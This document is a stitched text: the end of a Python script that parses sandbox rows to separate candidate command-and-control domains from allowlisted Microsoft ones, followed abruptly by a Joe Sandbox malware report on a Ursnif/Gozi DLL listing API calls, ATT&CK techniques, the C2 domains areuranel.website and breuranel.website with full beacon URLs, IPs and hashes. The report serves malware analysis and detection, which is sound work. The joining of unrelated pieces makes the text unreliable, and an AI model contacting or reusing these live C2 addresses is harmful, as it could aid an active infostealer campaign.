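Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: msn.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 13.82.28.61 187
"""

ROW_RE = re.compile(
    r"Source:\s+(?P<proc>\S+)\s+(?P<kind>Domain query|Network Connect):\s+(?P<val>\S+)"
)

# Triage assumption: Microsoft-owned names are treated as connectivity checks,
# everything else as candidate C2. Adjust to the environment.
ALLOWLIST_SUFFIXES = ("msn.com", "outlook.com", "office365.com")


def _allowlisted(host):
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in ALLOWLIST_SUFFIXES)


def parse_rows(text):
    """Group queried domains and connected IPs by the process that made them.
    Anything after the IP on a Network Connect row is left uninterpreted."""
    per_proc = defaultdict(lambda: {"domains": set(), "ips": set()})
    for m in ROW_RE.finditer(text):
        proc = m.group("proc").rsplit("\\", 1)[-1].lower()   # basename only
        val = m.group("val")
        if m.group("kind") == "Domain query":
            per_proc[proc]["domains"].add(val.lower().rstrip("."))
        else:
            try:
                per_proc[proc]["ips"].add(str(ipaddress.ip_address(val)))
            except ValueError:
                continue   # not an IP literal: skip rather than guess
    return dict(per_proc)


def triage(per_proc):
    """Split each process's domains into candidate C2 vs allowlisted; sort IPs numerically."""
    out = {}
    for proc, iocs in per_proc.items():
        out[proc] = {
            "candidate_c2": sorted(d for d in iocs["domains"] if not _allowlisted(d)),
            "allowlisted": sorted(d for d in iocs["domains"] if _allowlisted(d)),
            "ips": sorted(iocs["ips"], key=ipaddress.ip_address),
        }
    return out


def defang(ioc):
    """Make an indicator safe to paste into a ticket or chat."""
    return ioc.replace(".", "[.]")


if __name__ == "__main__":
    for proc, t in triage(parse_rows(REPORT_ROWS)).items():
        print(proc)
        for d in t["candidate_c2"]:
            print("  candidate C2 :", defang(d))
        for d in t["allowlisted"]:
            print("  allowlisted  :", defang(d))
        for ip in t["ips"]:
            print("  connect      :", defang(ip))
```

The IPs are listed separately rather than tied to a domain because the rows carry no resolution mapping; correlating them needs the DNS answers from the pcap, not the signature list.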
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmp Binary or memory string: Program Manager
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_00A3A82B cpuid
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E8D1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E92FF15 _free,_free,_free,GetTimeZoneInformation,_free,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E8D1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_00A3A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information:

                      Yara detected Ursnif

                      Remote Access Functionality:

                      Yara detected Ursnif

                      Mitre Att&ck Matrix

                      Techniques followed by a number are the ones the report matched for this sample (the number is the report's match count); the remaining entries are the unmatched cells of the matrix.

                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                      Execution: Windows Management Instrumentation 2; Native API 1; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
                      Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
                      Privilege Escalation: Process Injection 112; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
                      Defense Evasion: Virtualization/Sandbox Evasion 1; Process Injection 112; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 2; Rundll32 1; Steganography; Compile After Delivery; Indicator Removal from Tools
                      Credential Access: Input Capture 1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                      Discovery: System Time Discovery 2; Security Software Discovery 21; Virtualization/Sandbox Evasion 1; Process Discovery 2; Account Discovery 1; System Owner/User Discovery 1; Remote System Discovery 1; System Information Discovery 23
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
                      Collection: Input Capture 1; Archive Collected Data 1; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                      Command and Control: Encrypted Channel 11; Ingress Tool Transfer 3; Non-Application Layer Protocol 3; Application Layer Protocol 14; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
                      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                      Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

                      Behavior Graph

                      Behavior Graph ID: 500413; Sample: 616412739e268.dll; Startdate: 12/10/2021; Architecture: WINDOWS; Score: 88
                      Process chain shown in the graph: loaddll32.exe starts three rundll32.exe instances (each later starting WerFault.exe) and cmd.exe, which starts a further rundll32.exe.
                      Network nodes: msn.com (from the sample start node); loaddll32.exe contacts 40.101.60.226 port 443 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States), breuranel.website and 10 other IPs or domains; the rundll32.exe started by cmd.exe contacts breuranel.website, areuranel.website and 9 other IPs or domains; WerFault.exe contacts 192.168.2.1.
                      Signatures attached to the graph: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Ursnif; Writes or reads registry keys via WMI; Writes registry values via WMI; System process connects to network (likely due to code injection or exploit).

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      616412739e268.dll | 6% | Virustotal |
                      616412739e268.dll | 24% | ReversingLabs | Win32.Infostealer.Gozi

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      2.2.loaddll32.exe.a30000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
                      6.2.rundll32.exe.31a0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

                      Domains

                      No Antivirus matches

                      URLs


                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      msn.com | 13.82.28.61 | true | false | | high
                      outlook.com | 40.97.161.50 | true | false | | high
                      HHN-efz.ms-acdc.office.com | 52.98.207.210 | true | false | | high
                      FRA-efz.ms-acdc.office.com | 52.98.207.210 | true | false | | high
                      www.msn.com | unknown | unknown | false | | high
                      www.outlook.com | unknown | unknown | false | | high
                      areuranel.website | unknown | unknown | true | | unknown
                      breuranel.website | unknown | unknown | true | | unknown
                      outlook.office365.com | unknown | unknown | false | | high

                                        Contacted URLs


                                                        URLs from Memory and Binaries

                                                                                              high
                                                                                              https://www.msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7Ctrundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://areuranel.website/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrcax_2loaddll32.exe, 00000002.00000002.677754836.0000000000C1B000.00000004.00000020.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.msn.com/?refurl=%2fmail%2fliopolo%2fVn4JvoFId6Cp3NLYZ%2fukfCWWcxchPj%2fqCUcA7g4p8o%2fIzqloaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://areuranel.website:443/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrcloaddll32.exe, 00000002.00000002.678292868.0000000000C70000.00000004.00000020.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown

Contacted IPs

Public

IP             Domain                       Country        ASN   ASN Name                       Malicious
40.97.161.50   outlook.com                  United States  8075  MICROSOFT-CORP-MSN-AS-BLOCKUS  false
13.82.28.61    msn.com                      United States  8075  MICROSOFT-CORP-MSN-AS-BLOCKUS  false
52.98.207.210  HHN-efz.ms-acdc.office.com   United States  8075  MICROSOFT-CORP-MSN-AS-BLOCKUS  false
40.101.60.226  unknown                      United States  8075  MICROSOFT-CORP-MSN-AS-BLOCKUS  true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 500413
Start date: 12.10.2021
Start time: 00:47:57
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 6s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 616412739e268.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Run with higher sleep bypass
Number of new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal88.troj.evad.winDLL@14/12@15/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 16.7% (good quality ratio 16.1%)
• Quality average: 79%
• Quality standard deviation: 28.5%
HCA Information:
• Successful, ratio: 68%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Sleeps bigger than 120000ms are automatically reduced to 1000ms
• Found application associated with file extension: .dll
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 93.184.221.240, 13.107.4.50, 20.199.120.151, 20.199.120.182, 20.199.120.85, 52.139.176.199, 204.79.197.203, 40.126.31.141, 40.126.31.6, 40.126.31.143, 20.190.159.138, 40.126.31.137, 20.190.159.132, 40.126.31.139, 20.190.159.134, 52.184.81.210, 20.42.73.29, 52.168.117.173, 20.189.173.22, 2.20.178.24, 2.20.178.33, 20.54.110.249, 52.251.79.25, 40.112.88.60
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, b1ns.c-0001.c-msedge.net, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, onedsblobprdeus15.eastus.cloudapp.azure.com, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, b1ns.au-msedge.net, client.wns.windows.com, iris-de-prod-azsc-eas.eastasia.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, a-0003.a-msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, www-msn-com.a-0003.a-msedge.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, login.msa.msidentity.com, ris.api.iris.microsoft.com, dub2.current.a.prd.aadg.trafficmanager.net, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time      Type             Description
00:50:33  API Interceptor  1x Sleep call for process: loaddll32.exe modified
00:50:38  API Interceptor  1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match: 40.97.161.50
  m87xfb63XU.dll (malicious)
  6yDD19jMIu.dll (malicious)
  6yDD19jMIu.dll (malicious)
  B6VQd36tt6.dll (malicious)
  test1.dll (malicious)
  6.dll (malicious)
  6101135878f66.dll (malicious)
  a9FUs89dWy.dll (malicious)
  609a460e94791.tiff.dll (malicious)
  13fil.exe (malicious)
  24messag.exe (malicious)
  .exe (malicious)
  .exe (malicious)
  66documen.exe (malicious)
  9messag.exe (malicious)
Match: 13.82.28.61
  45DOC00111738011537818635391-pdf.exe (malicious)
    • msn.com/

Domains

Match: outlook.com
  P2AN3Yrtnz.exe (malicious)
    • 40.93.212.0
  Hm7d40tE44.exe (malicious)
    • 104.47.53.36
  SecuriteInfo.com.W32.AIDetect.malware2.21009.exe (malicious)
    • 104.47.53.36
  in7BcpKNoa.exe (malicious)
    • 40.93.212.0
  aXNdDIO708.exe (malicious)
    • 104.47.53.36
  vhPaw5lCuv.exe (malicious)
    • 40.93.212.0
  5sTWnI5RoC.exe (malicious)
    • 40.93.207.0
  57wF9hu0V5.exe (malicious)
    • 40.93.207.0
  7zxmUw3Ml1.exe (malicious)
    • 104.47.53.36
  Nh1UI4PFGW.exe (malicious)
    • 52.101.24.0
  rEYF2xcbGR.exe (malicious)
    • 40.93.207.1
  G2Shy4flZe.exe (malicious)
    • 40.93.207.1

ASN

Match: MICROSOFT-CORP-MSN-AS-BLOCKUS
  616412739e268.dll (malicious)
    • 52.97.183.162
  m87xfb63XU.dll (malicious)
    • 40.101.60.226
  m87xfb63XU.dll (malicious)
    • 52.97.151.66
  6yDD19jMIu.dll (malicious)
    • 13.82.28.61
  6yDD19jMIu.dll (malicious)
    • 13.82.28.61
  B6VQd36tt6.dll (malicious)
    • 13.82.28.61
  B6VQd36tt6.dll (malicious)
    • 52.97.183.162
  P2AN3Yrtnz.exe (malicious)
    • 40.93.212.0
  b3astmode.x86 (malicious)
    • 72.154.237.78
  b3astmode.arm7 (malicious)
    • 20.153.181.154
  b3astmode.arm7-20211011-1850 (malicious)
    • 20.63.129.213
  TNIZtb3HS3.exe (malicious)
    • 20.42.65.92
  PROFORMA INVOICE -PI6120..html (malicious)
    • 40.101.62.34
  setup_x86_x64_install.exe (malicious)
    • 52.168.117.173
  ntpclient (malicious)
    • 21.215.78.72
  2021catalog-selected products.xlsm (malicious)
    • 13.92.100.208
  K6E9636Koq (malicious)
    • 159.27.209.248
  setup_x86_x64_install.exe (malicious)
    • 20.42.73.29
  Hm7d40tE44.exe (malicious)
    • 104.47.53.36
  mixsix_20211008-150045.exe (malicious)
    • 20.189.173.22

JA3 Fingerprints

Match: ce5f3254611a8c095a3d821d44539877

Associated Sample Name / URL | SHA 256 | Detection | Link | Context
616412739e268.dll | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
m87xfb63XU.dll | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
m87xfb63XU.dll | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
6yDD19jMIu.dll | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
6yDD19jMIu.dll | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
B6VQd36tt6.dll | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
B6VQd36tt6.dll | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
setup_x86_x64_install.exe | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
aVFOmbW2t7.dll | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
gxJ83rJkgw.msi | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
yR4AxlwcWJ.exe | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
BsyK7FB5DQ.exe | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
SGfGZT66wD.exe | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
uT9rwkGATJ.dll | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
XK1PLPuwjL.exe | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
pHEiqE9toa.msi | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
SecuriteInfo.com.W32.AIDetect.malware2.24481.exe | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
vH0SHswvrb.exe | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
NM0NyvZi8O.exe | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226
yOTzv1Qz0n.exe | Get hash | malicious | Browse
  • 40.97.161.50
  • 13.82.28.61
  • 52.98.207.210
  • 40.101.60.226

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_4323c1d7a32576d87639b5d887c5a93fe7aab20_82810a17_134e49f4\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 11922
Entropy (8bit): 3.7581261502125924
Encrypted: false
SSDEEP: 192:TFs6iG0oXWHygBWjed+x/u7sMS274ItWcq:y6igXOygBWje8/u7sMX4ItWcq
MD5: 393A3C31649BD29973306D0F85A32BCC
SHA1: FF3907D20E074D3DA8B205FD00E430C7AC757B8B
SHA-256: 3474F1F823B321D214E319FB6DCEE5DAE41798381419B3FFFA520BFD4908C3F0
SHA-512: 1636C709A088992524FA1E9420BBFC1DB3C81D98987D259ABE8829A5620958742106A588D897A76F6042E454A393EECF27E1A6889124E852D4AFBA478685F43E
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.8.6.5.3.5.5.5.3.2.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.8.6.6.0.7.7.4.0.5.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.e.7.5.6.7.5.-.6.b.b.d.-.4.7.c.d.-.9.5.5.3.-.f.9.0.7.1.d.a.6.9.a.7.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.f.4.4.f.1.0.-.0.1.c.d.-.4.7.6.e.-.a.1.1.1.-.3.b.f.a.4.d.4.7.6.2.7.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.7.c.-.0.0.0.1.-.0.0.1.c.-.9.9.d.9.-.0.f.a.3.3.d.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_120258ba\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 12042
Entropy (8bit): 3.764569090051945
Encrypted: false
SSDEEP: 192:WYiJ0oX1HBUZMX4jed+x/u7sMS274It7c5:1inXlBUZMX4je8/u7sMX4It7c5
MD5: 3F8355DAD9CF57B7376FA2D5C6AD95EE
SHA1: CB52C465F96C0A0AF69590C43FBDDB918D2A7E9E
SHA-256: 4F5DC83FE9F23AE55485CF812B54AEEC15BF2D0103BEB805F7D6F96ED6E8EBBE
SHA-512: AD507D613D8012026CCEEF32126498B7BD0AD69A3344748BD5CF594B297EB5FAE922D63E7C9DEE8A92639FEF111B20F223D7ACA1419A33797EAFBA5820ED8360
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.8.6.5.6.8.1.2.0.1.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.8.6.6.7.0.6.2.0.1.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.9.a.f.8.5.3.-.9.4.1.4.-.4.3.1.b.-.9.4.8.0.-.5.b.c.4.a.b.e.1.c.2.b.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.4.a.3.0.0.2.-.0.4.f.b.-.4.5.2.0.-.b.5.c.d.-.2.5.6.8.0.7.f.d.5.a.2.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.0.8.-.0.0.0.1.-.0.0.1.c.-.0.6.f.a.-.7.6.a.5.3.d.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_16ee2ecb\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 12042
